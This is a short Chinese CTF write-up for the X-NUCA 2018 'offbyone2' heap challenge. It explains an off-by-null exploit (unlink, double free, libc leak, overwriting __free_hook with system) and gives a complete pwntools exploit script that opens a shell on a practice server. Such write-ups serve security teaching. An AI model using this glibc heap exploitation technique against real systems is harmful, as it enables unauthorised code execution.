x_nuca_2018_offbyone2:
在第七页挑了个题目做,好像不是很难
检查一下,got表可写
漏洞分析:
有个off by null
这题还有输出函数,挺好做的
利用思路:
1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方
造成doublefree,我们再顺便泄露了libc
2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了
exp:
from pwn import *
#from LibcSearcher import *
local_file = './X-nuca_2018_offbyone2'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',26179 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
#--------------------------
def add(length,content):
sla('>> ','1')
sla('length: ',str(length))
sa('your note:\n',content)
def delete(index):
sla('>> ','2')
sla('index: ',str(index))
def show(index):
sla('>> ','3')
sla('index: ',str(index))
#------------------------------
add(0x410,'aaaa\n')
add(0x88,'b'*0x80+'\n')
add(0x4f0,'cccc\n')
add(0x80,'/bin/sh\x00\n')
delete(1)
delete(0)
add(0x88,'c'*0x80+p64(0x90+0x420))
delete(2)
add(0x410,'cccc\n')
show(0)
libc_base=uu64(ru('\x7f')[-6:])-96-0x10-libc.sym['__malloc_hook']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
add(0x88,'a\n')
delete(0)
delete(2)
add(0x88,p64(free_hook)+'\n')
add(0x88,p64(0)+'\n')
add(0x88,p64(system)+'\n')
delete(3)
#debug()
r.interactive()
其他:
一加九十多分真爽